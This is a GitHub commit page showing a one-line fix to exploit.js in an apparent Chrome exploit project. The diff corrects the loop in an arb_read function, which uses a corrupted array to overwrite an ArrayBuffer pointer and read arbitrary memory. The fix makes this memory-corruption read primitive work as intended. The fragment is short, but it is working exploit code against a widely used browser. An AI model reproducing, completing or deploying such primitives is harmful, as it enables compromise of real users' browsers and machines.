Skip to content

Commit 9792655

Browse files
authored
Update exploit.js
1 parent 457c8e8 commit 9792655

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

chrome-exploit/exploit.js

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -106,7 +106,7 @@ function arb_read(addr, length)
106106
var data = [];
107107
let u8_arraybuf = new Uint8Array(arraybuf);
108108
corrupted_array[arraybuf_idx+1] = itof(addr);
109-
for(i=0;i<data.length;++i)
109+
for(i=0;i<length;++i)
110110
data.push(u8_arraybuf[i]);
111111
return data;
112112
}

0 commit comments

Comments
 (0)